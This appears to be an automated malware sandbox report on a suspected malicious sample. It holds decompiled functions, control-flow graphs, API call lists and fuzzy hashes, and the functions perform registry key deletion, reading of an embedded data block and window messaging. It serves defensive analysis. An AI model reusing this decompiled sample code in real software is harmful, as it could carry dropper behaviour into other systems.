                                                                        • Instruction Fuzzy Hash: 95010871D04219EAEF009FA1CD44BEFBBB8EF14314F04403ADA44B6180E7789648CB99
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 873 402ea9-402ed2 call 4064d5 875 402ed7-402edb 873->875 876 402ee1-402ee5 875->876 877 402f8c-402f90 875->877 878 402ee7-402f08 RegEnumValueW 876->878 879 402f0a-402f1d 876->879 878->879 880 402f71-402f7f RegCloseKey 878->880 881 402f46-402f4d RegEnumKeyW 879->881 880->877 882 402f1f-402f21 881->882 883 402f4f-402f61 RegCloseKey call 406a35 881->883 882->880 885 402f23-402f37 call 402ea9 882->885 889 402f81-402f87 883->889 890 402f63-402f6f RegDeleteKeyW 883->890 885->883 891 402f39-402f45 885->891 889->877 890->877 891->881
                                                                        C-Code - Quality: 48%
                                                                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
                                                                        				void* _v8;
                                                                        				int _v12;
                                                                        				short _v536;
                                                                        				void* _t27;
                                                                        				signed int _t33;
                                                                        				intOrPtr* _t35;
                                                                        				signed int _t45;
                                                                        				signed int _t46;
                                                                        				signed int _t47;
                                                                        
                                                                        				_t46 = _a12;
                                                                        				_t47 = _t46 & 0x00000300;
                                                                        				_t45 = _t46 & 0x00000001;
                                                                        				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8); // executed
                                                                        				if(_t27 == 0) {
                                                                        					if((_a12 & 0x00000002) == 0) {
                                                                        						L3:
                                                                        						_push(0x105);
                                                                        						_push( &_v536);
                                                                        						_push(0);
                                                                        						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
                                                                        							__eflags = _t45;
                                                                        							if(__eflags != 0) {
                                                                        								L10:
                                                                        								RegCloseKey(_v8);
                                                                        								return 0x3eb;
                                                                        							}
                                                                        							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
                                                                        							__eflags = _t33;
                                                                        							if(_t33 != 0) {
                                                                        								break;
                                                                        							}
                                                                        							_push(0x105);
                                                                        							_push( &_v536);
                                                                        							_push(_t45);
                                                                        						}
                                                                        						RegCloseKey(_v8);
                                                                        						_t35 = E00406A35(3);
                                                                        						if(_t35 != 0) {
                                                                        							return  *_t35(_a4, _a8, _t47, 0);
                                                                        						}
                                                                        						return RegDeleteKeyW(_a4, _a8);
                                                                        					}
                                                                        					_v12 = 0;
                                                                        					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                        						goto L10;
                                                                        					}
                                                                        					goto L3;
                                                                        				}
                                                                        				return _t27;
                                                                        			}












                                                                        0x00402eb4
                                                                        0x00402ebd
                                                                        0x00402ec6
                                                                        0x00402ed2
                                                                        0x00402edb
                                                                        0x00402ee5
                                                                        0x00402f0a
                                                                        0x00402f10
                                                                        0x00402f15
                                                                        0x00402f16
                                                                        0x00402f46
                                                                        0x00402f1f
                                                                        0x00402f21
                                                                        0x00402f71
                                                                        0x00402f74
                                                                        0x00000000
                                                                        0x00402f7a
                                                                        0x00402f30
                                                                        0x00402f35
                                                                        0x00402f37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402f3f
                                                                        0x00402f44
                                                                        0x00402f45
                                                                        0x00402f45
                                                                        0x00402f52
                                                                        0x00402f5a
                                                                        0x00402f61
                                                                        0x00000000
                                                                        0x00402f8a
                                                                        0x00000000
                                                                        0x00402f69
                                                                        0x00402ef5
                                                                        0x00402f08
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402f08
                                                                        0x00402f90

                                                                        APIs
                                                                        • RegEnumValueW.ADVAPI32 ref: 00402EFD
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CloseEnum$DeleteValue
                                                                        • String ID:
                                                                        • API String ID: 1354259210-0
                                                                        • Opcode ID: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                        • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                        • Opcode Fuzzy Hash: 953796069c20d6fa7490a0bfa1861ca0c616837e62ffc418281f2642f3cef6d6
                                                                        • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 892 72491817-72491856 call 72491bff 896 7249185c-72491860 892->896 897 72491976-72491978 892->897 898 72491869-72491876 call 72492480 896->898 899 72491862-72491868 call 7249243e 896->899 904 72491878-7249187d 898->904 905 724918a6-724918ad 898->905 899->898 908 72491898-7249189b 904->908 909 7249187f-72491880 904->909 906 724918cd-724918d1 905->906 907 724918af-724918cb call 72492655 call 72491654 call 72491312 GlobalFree 905->907 914 7249191e-72491924 call 72492655 906->914 915 724918d3-7249191c call 72491666 call 72492655 906->915 931 72491925-72491929 907->931 908->905 910 7249189d-7249189e call 72492e23 908->910 912 72491888-72491889 call 72492b98 909->912 913 72491882-72491883 909->913 923 724918a3 910->923 926 7249188e 912->926 919 72491890-72491896 call 72492810 913->919 920 72491885-72491886 913->920 914->931 915->931 930 724918a5 919->930 920->905 920->912 923->930 926->923 930->905 935 7249192b-72491939 call 72492618 931->935 936 72491966-7249196d 931->936 942 7249193b-7249193e 935->942 943 72491951-72491958 935->943 936->897 938 7249196f-72491970 GlobalFree 936->938 938->897 942->943 944 72491940-72491948 942->944 943->936 945 7249195a-72491965 call 724915dd 943->945 944->943 946 7249194a-7249194b FreeLibrary 944->946 945->936 946->943
                                                                        C-Code - Quality: 88%
                                                                        			E72491817(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                        				void _v36;
                                                                        				char _v136;
                                                                        				struct HINSTANCE__* _t37;
                                                                        				void* _t39;
                                                                        				intOrPtr _t42;
                                                                        				void* _t48;
                                                                        				void* _t49;
                                                                        				void* _t50;
                                                                        				void* _t54;
                                                                        				intOrPtr _t57;
                                                                        				signed int _t61;
                                                                        				signed int _t63;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        				void* _t72;
                                                                        				void* _t76;
                                                                        
                                                                        				_t76 = __esi;
                                                                        				_t68 = __edi;
                                                                        				_t67 = __edx;
                                                                        				 *0x7249506c = _a8;
                                                                        				 *0x72495070 = _a16;
                                                                        				 *0x72495074 = _a12;
                                                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x72495048, E72491651);
                                                                        				_push(1); // executed
                                                                        				_t37 = E72491BFF(); // executed
                                                                        				_t54 = _t37;
                                                                        				if(_t54 == 0) {
                                                                        					L28:
                                                                        					return _t37;
                                                                        				} else {
                                                                        					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                        						E7249243E(_t54);
                                                                        					}
                                                                        					_push(_t54);
                                                                        					E72492480(_t67);
                                                                        					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                        					if(_t57 == 0xffffffff) {
                                                                        						L14:
                                                                        						if(( *(_t54 + 0x1010) & 0x00000004) == 0) {
                                                                        							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                        								_push(_t54);
                                                                        								_t37 = E72492655();
                                                                        							} else {
                                                                        								_push(_t76);
                                                                        								_push(_t68);
                                                                        								_t61 = 8;
                                                                        								_t13 = _t54 + 0x1018; // 0x1018
                                                                        								memcpy( &_v36, _t13, _t61 << 2);
                                                                        								_t42 = E72491666(_t54,  &_v136);
                                                                        								 *(_t54 + 0x1034) =  *(_t54 + 0x1034) & 0x00000000;
                                                                        								_t18 = _t54 + 0x1018; // 0x1018
                                                                        								_t72 = _t18;
                                                                        								_push(_t54);
                                                                        								 *((intOrPtr*)(_t54 + 0x1020)) = _t42;
                                                                        								 *_t72 = 4;
                                                                        								E72492655();
                                                                        								_t63 = 8;
                                                                        								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                        							}
                                                                        						} else {
                                                                        							_push(_t54);
                                                                        							E72492655();
                                                                        							_t37 = GlobalFree(E72491312(E72491654(_t54)));
                                                                        						}
                                                                        						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                        							_t37 = E72492618(_t54);
                                                                        							if(( *(_t54 + 0x1010) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                        								_t37 =  *(_t54 + 0x1008);
                                                                        								if(_t37 != 0) {
                                                                        									_t37 = FreeLibrary(_t37);
                                                                        								}
                                                                        							}
                                                                        							if(( *(_t54 + 0x1010) & 0x00000020) != 0) {
                                                                        								_t37 = E724915DD( *0x72495068);
                                                                        							}
                                                                        						}
                                                                        						if(( *(_t54 + 0x1010) & 0x00000002) != 0) {
                                                                        							goto L28;
                                                                        						} else {
                                                                        							_t39 = GlobalFree(_t54); // executed
                                                                        							return _t39;
                                                                        						}
                                                                        					}
                                                                        					_t48 =  *_t54;
                                                                        					if(_t48 == 0) {
                                                                        						if(_t57 != 1) {
                                                                        							goto L14;
                                                                        						}
                                                                        						E72492E23(_t54);
                                                                        						L12:
                                                                        						_t54 = _t48;
                                                                        						L13:
                                                                        						goto L14;
                                                                        					}
                                                                        					_t49 = _t48 - 1;
                                                                        					if(_t49 == 0) {
                                                                        						L8:
                                                                        						_t48 = E72492B98(_t57, _t54); // executed
                                                                        						goto L12;
                                                                        					}
                                                                        					_t50 = _t49 - 1;
                                                                        					if(_t50 == 0) {
                                                                        						E72492810(_t54);
                                                                        						goto L13;
                                                                        					}
                                                                        					if(_t50 != 1) {
                                                                        						goto L14;
                                                                        					}
                                                                        					goto L8;
                                                                        				}
                                                                        			}



















                                                                        0x72491817
                                                                        0x72491817
                                                                        0x72491817
                                                                        0x72491824
                                                                        0x7249182c
                                                                        0x72491839
                                                                        0x72491847
                                                                        0x7249184a
                                                                        0x7249184c
                                                                        0x72491851
                                                                        0x72491856
                                                                        0x72491978
                                                                        0x72491978
                                                                        0x7249185c
                                                                        0x72491860
                                                                        0x72491863
                                                                        0x72491868
                                                                        0x72491869
                                                                        0x7249186a
                                                                        0x72491870
                                                                        0x72491876
                                                                        0x724918a6
                                                                        0x724918ad
                                                                        0x724918d1
                                                                        0x7249191e
                                                                        0x7249191f
                                                                        0x724918d3
                                                                        0x724918d3
                                                                        0x724918d4
                                                                        0x724918dd
                                                                        0x724918de
                                                                        0x724918e8
                                                                        0x724918eb
                                                                        0x724918f0
                                                                        0x724918f7
                                                                        0x724918f7
                                                                        0x724918fd
                                                                        0x724918fe
                                                                        0x72491904
                                                                        0x7249190a
                                                                        0x72491917
                                                                        0x72491918
                                                                        0x7249191b
                                                                        0x724918af
                                                                        0x724918af
                                                                        0x724918b0
                                                                        0x724918c5
                                                                        0x724918c5
                                                                        0x72491929
                                                                        0x7249192c
                                                                        0x72491939
                                                                        0x72491940
                                                                        0x72491948
                                                                        0x7249194b
                                                                        0x7249194b
                                                                        0x72491948
                                                                        0x72491958
                                                                        0x72491960
                                                                        0x72491965
                                                                        0x72491958
                                                                        0x7249196d
                                                                        0x00000000
                                                                        0x7249196f
                                                                        0x72491970
                                                                        0x00000000
                                                                        0x72491970
                                                                        0x7249196d
                                                                        0x7249187a
                                                                        0x7249187d
                                                                        0x7249189b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x7249189e
                                                                        0x724918a3
                                                                        0x724918a3
                                                                        0x724918a5
                                                                        0x00000000
                                                                        0x724918a5
                                                                        0x7249187f
                                                                        0x72491880
                                                                        0x72491888
                                                                        0x72491889
                                                                        0x00000000
                                                                        0x72491889
                                                                        0x72491882
                                                                        0x72491883
                                                                        0x72491891
                                                                        0x00000000
                                                                        0x72491891
                                                                        0x72491886
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x72491886

                                                                        APIs
                                                                          • Part of subcall function 72491BFF: GlobalFree.KERNEL32 ref: 72491E74
                                                                          • Part of subcall function 72491BFF: GlobalFree.KERNEL32 ref: 72491E79
                                                                          • Part of subcall function 72491BFF: GlobalFree.KERNEL32 ref: 72491E7E
                                                                        • GlobalFree.KERNEL32 ref: 724918C5
                                                                        • FreeLibrary.KERNEL32(?), ref: 7249194B
                                                                        • GlobalFree.KERNEL32 ref: 72491970
                                                                          • Part of subcall function 7249243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7249246F
                                                                          • Part of subcall function 72492810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,72491896,00000000), ref: 724928E0
                                                                          • Part of subcall function 72491666: wsprintfW.USER32 ref: 72491694
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.883195763.0000000072491000.00000020.00000001.01000000.00000006.sdmp, Offset: 72490000, based on PE: true
                                                                        • Associated: 00000000.00000002.883191252.0000000072490000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883203445.0000000072494000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        • Associated: 00000000.00000002.883208180.0000000072496000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72490000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                        • String ID:
                                                                        • API String ID: 3962662361-3916222277
                                                                        • Opcode ID: 43dd5c11c85bf07b1f9e1fa5475144075e7bd12631eb1ed35bafb194722b55f6
                                                                        • Instruction ID: 9f59b6a2b735b827cdc6f38b4bcd3e2d0d9523868c3b38792b682c33ace0ac16
                                                                        • Opcode Fuzzy Hash: 43dd5c11c85bf07b1f9e1fa5475144075e7bd12631eb1ed35bafb194722b55f6
                                                                        • Instruction Fuzzy Hash: E941B0728002019FDB11DF2CD884B953FBCAF05358F146869E9CFAA286DB748485CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 949 403479-4034a1 GetTickCount 950 4035d1-4035d9 call 40302e 949->950 951 4034a7-4034d2 call 4035f8 SetFilePointer 949->951 956 4035db-4035df 950->956 957 4034d7-4034e9 951->957 958 4034eb 957->958 959 4034ed-4034fb call 4035e2 957->959 958->959 962 403501-40350d 959->962 963 4035c3-4035c6 959->963 964 403513-403519 962->964 963->956 965 403544-403560 call 406bb0 964->965 966 40351b-403521 964->966 971 403562-40356a 965->971 972 4035cc 965->972 966->965 967 403523-403543 call 40302e 966->967 967->965 974 40356c-403574 call 40620a 971->974 975 40358d-403593 971->975 976 4035ce-4035cf 972->976 979 403579-40357b 974->979 975->972 978 403595-403597 975->978 976->956 978->972 980 403599-4035ac 978->980 981 4035c8-4035ca 979->981 982 40357d-403589 979->982 980->957 983 4035b2-4035c1 SetFilePointer 980->983 981->976 982->964 984 40358b 982->984 983->950 984->980
                                                                        C-Code - Quality: 94%
                                                                        			E00403479(intOrPtr _a4) {
                                                                        				intOrPtr _t10;
                                                                        				intOrPtr _t11;
                                                                        				signed int _t12;
                                                                        				void* _t14;
                                                                        				void* _t15;
                                                                        				long _t16;
                                                                        				void* _t18;
                                                                        				intOrPtr _t19;
                                                                        				intOrPtr _t31;
                                                                        				long _t32;
                                                                        				intOrPtr _t34;
                                                                        				intOrPtr _t36;
                                                                        				void* _t37;
                                                                        				intOrPtr _t49;
                                                                        
                                                                        				_t32 =  *0x420ef4; // 0x24d7b
                                                                        				_t34 = _t32 -  *0x40ce60 + _a4;
                                                                        				 *0x42a26c = GetTickCount() + 0x1f4;
                                                                        				if(_t34 <= 0) {
                                                                        					L22:
                                                                        					E0040302E(1);
                                                                        					return 0;
                                                                        				}
                                                                        				E004035F8( *0x420f04);
                                                                        				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                                                                        				 *0x420f00 = _t34;
                                                                        				 *0x420ef0 = 0;
                                                                        				while(1) {
                                                                        					_t10 =  *0x420ef8; // 0x22c00
                                                                        					_t31 = 0x4000;
                                                                        					_t11 = _t10 -  *0x420f04;
                                                                        					if(_t11 <= 0x4000) {
                                                                        						_t31 = _t11;
                                                                        					}
                                                                        					_t12 = E004035E2(0x414ef0, _t31);
                                                                        					if(_t12 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					 *0x420f04 =  *0x420f04 + _t31;
                                                                        					 *0x40ce80 = 0x414ef0;
                                                                        					 *0x40ce84 = _t31;
                                                                        					L6:
                                                                        					L6:
                                                                        					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
                                                                        						_t19 =  *0x420f00; // 0x1425
                                                                        						 *0x420ef0 = _t19 -  *0x420ef4 - _a4 +  *0x40ce60;
                                                                        						E0040302E(0);
                                                                        					}
                                                                        					 *0x40ce88 = 0x40cef0;
                                                                        					 *0x40ce8c = 0x8000; // executed
                                                                        					_t14 = E00406BB0(0x40ce68); // executed
                                                                        					if(_t14 < 0) {
                                                                        						goto L20;
                                                                        					}
                                                                        					_t36 =  *0x40ce88; // 0x40eb3e
                                                                        					_t37 = _t36 - 0x40cef0;
                                                                        					if(_t37 == 0) {
                                                                        						__eflags =  *0x40ce84; // 0x0
                                                                        						if(__eflags != 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						__eflags = _t31;
                                                                        						if(_t31 == 0) {
                                                                        							goto L20;
                                                                        						}
                                                                        						L16:
                                                                        						_t16 =  *0x420ef4; // 0x24d7b
                                                                        						if(_t16 -  *0x40ce60 + _a4 > 0) {
                                                                        							continue;
                                                                        						}
                                                                        						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                        						goto L22;
                                                                        					}
                                                                        					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
                                                                        					if(_t18 == 0) {
                                                                        						_push(0xfffffffe);
                                                                        						L21:
                                                                        						_pop(_t15);
                                                                        						return _t15;
                                                                        					}
                                                                        					 *0x40ce60 =  *0x40ce60 + _t37;
                                                                        					_t49 =  *0x40ce84; // 0x0
                                                                        					if(_t49 != 0) {
                                                                        						goto L6;
                                                                        					}
                                                                        					goto L16;
                                                                        					L20:
                                                                        					_push(0xfffffffd);
                                                                        					goto L21;
                                                                        				}
                                                                        				return _t12 | 0xffffffff;
                                                                        			}

















                                                                        0x0040347c
                                                                        0x00403489
                                                                        0x0040349c
                                                                        0x004034a1
                                                                        0x004035d1
                                                                        0x004035d3
                                                                        0x00000000
                                                                        0x004035d9
                                                                        0x004034ad
                                                                        0x004034c0
                                                                        0x004034c6
                                                                        0x004034cc
                                                                        0x004034d7
                                                                        0x004034d7
                                                                        0x004034dc
                                                                        0x004034e1
                                                                        0x004034e9
                                                                        0x004034eb
                                                                        0x004034eb
                                                                        0x004034f4
                                                                        0x004034fb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403501
                                                                        0x00403507
                                                                        0x0040350d
                                                                        0x00000000
                                                                        0x00403513
                                                                        0x00403519
                                                                        0x00403523
                                                                        0x00403539
                                                                        0x0040353e
                                                                        0x00403543
                                                                        0x00403549
                                                                        0x0040354f
                                                                        0x00403559
                                                                        0x00403560
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403562
                                                                        0x00403568
                                                                        0x0040356a
                                                                        0x0040358d
                                                                        0x00403593
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403595
                                                                        0x00403597
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403599
                                                                        0x00403599
                                                                        0x004035ac
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004035bb
                                                                        0x00000000
                                                                        0x004035bb
                                                                        0x00403574
                                                                        0x0040357b
                                                                        0x004035c8
                                                                        0x004035ce
                                                                        0x004035ce
                                                                        0x00000000
                                                                        0x004035ce
                                                                        0x0040357d
                                                                        0x00403583
                                                                        0x00403589
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004035cc
                                                                        0x004035cc
                                                                        0x00000000
                                                                        0x004035cc
                                                                        0x00000000

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 0040348D
                                                                          • Part of subcall function 004035F8: SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
                                                                        • SetFilePointer.KERNELBASE(00024D7B,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer$CountTick
                                                                        • String ID: >@
                                                                        • API String ID: 1092082344-3214575836
                                                                        • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                        • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                        • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                        • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 985 401c43-401c63 call 402d84 * 2 990 401c65-401c6c call 402da6 985->990 991 401c6f-401c73 985->991 990->991 993 401c75-401c7c call 402da6 991->993 994 401c7f-401c85 991->994 993->994 997 401cd3-401cfd call 402da6 * 2 FindWindowExW 994->997 998 401c87-401ca3 call 402d84 * 2 994->998 1010 401d03 997->1010 1008 401cc3-401cd1 SendMessageW 998->1008 1009 401ca5-401cc1 SendMessageTimeoutW 998->1009 1008->1010 1011 401d06-401d09 1009->1011 1010->1011 1012 402c2a-402c39 1011->1012 1013 401d0f 1011->1013 1013->1012
                                                                        C-Code - Quality: 59%
                                                                        			E00401C43(intOrPtr __edx) {
                                                                        				int _t29;
                                                                        				long _t30;
                                                                        				signed int _t32;
                                                                        				WCHAR* _t35;
                                                                        				long _t36;
                                                                        				int _t41;
                                                                        				signed int _t42;
                                                                        				int _t46;
                                                                        				int _t56;
                                                                        				intOrPtr _t57;
                                                                        				struct HWND__* _t63;
                                                                        				void* _t64;
                                                                        
                                                                        				_t57 = __edx;
                                                                        				_t29 = E00402D84(3);
                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                        				 *(_t64 - 0x18) = _t29;
                                                                        				_t30 = E00402D84(4);
                                                                        				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                        				 *(_t64 + 8) = _t30;
                                                                        				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
                                                                        					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
                                                                        				}
                                                                        				__eflags =  *(_t64 - 0x1c) & 0x00000002;
                                                                        				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
                                                                        					 *(_t64 + 8) = E00402DA6(0x44);
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
                                                                        				_push(1);
                                                                        				if(__eflags != 0) {
                                                                        					_t61 = E00402DA6();
                                                                        					_t32 = E00402DA6();
                                                                        					asm("sbb ecx, ecx");
                                                                        					asm("sbb eax, eax");
                                                                        					_t35 =  ~( *_t31) & _t61;
                                                                        					__eflags = _t35;
                                                                        					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
                                                                        					goto L10;
                                                                        				} else {
                                                                        					_t63 = E00402D84();
                                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                        					_t41 = E00402D84(2);
                                                                        					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                        					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                        					if(__eflags == 0) {
                                                                        						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                        						L10:
                                                                        						 *(_t64 - 0x38) = _t36;
                                                                        					} else {
                                                                        						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                        						asm("sbb eax, eax");
                                                                        						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                        					}
                                                                        				}
                                                                        				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                        				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                        					_push( *(_t64 - 0x38));
                                                                        					E004065AF();
                                                                        				}
                                                                        				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
                                                                        				return 0;
                                                                        			}















                                                                        0x00401c43
                                                                        0x00401c45
                                                                        0x00401c4c
                                                                        0x00401c4f
                                                                        0x00401c52
                                                                        0x00401c5c
                                                                        0x00401c60
                                                                        0x00401c63
                                                                        0x00401c6c
                                                                        0x00401c6c
                                                                        0x00401c6f
                                                                        0x00401c73
                                                                        0x00401c7c
                                                                        0x00401c7c
                                                                        0x00401c7f
                                                                        0x00401c83
                                                                        0x00401c85
                                                                        0x00401cda
                                                                        0x00401cdc
                                                                        0x00401ce7
                                                                        0x00401cf1
                                                                        0x00401cf4
                                                                        0x00401cf4
                                                                        0x00401cfd
                                                                        0x00000000
                                                                        0x00401c87
                                                                        0x00401c8e
                                                                        0x00401c90
                                                                        0x00401c93
                                                                        0x00401c99
                                                                        0x00401ca0
                                                                        0x00401ca3
                                                                        0x00401ccb
                                                                        0x00401d03
                                                                        0x00401d03
                                                                        0x00401ca5
                                                                        0x00401cb3
                                                                        0x00401cbb
                                                                        0x00401cbe
                                                                        0x00401cbe
                                                                        0x00401ca3
                                                                        0x00401d06
                                                                        0x00401d09
                                                                        0x00401d0f
                                                                        0x00402ba4
                                                                        0x00402ba4
                                                                        0x00402c2d
                                                                        0x00402c39

                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
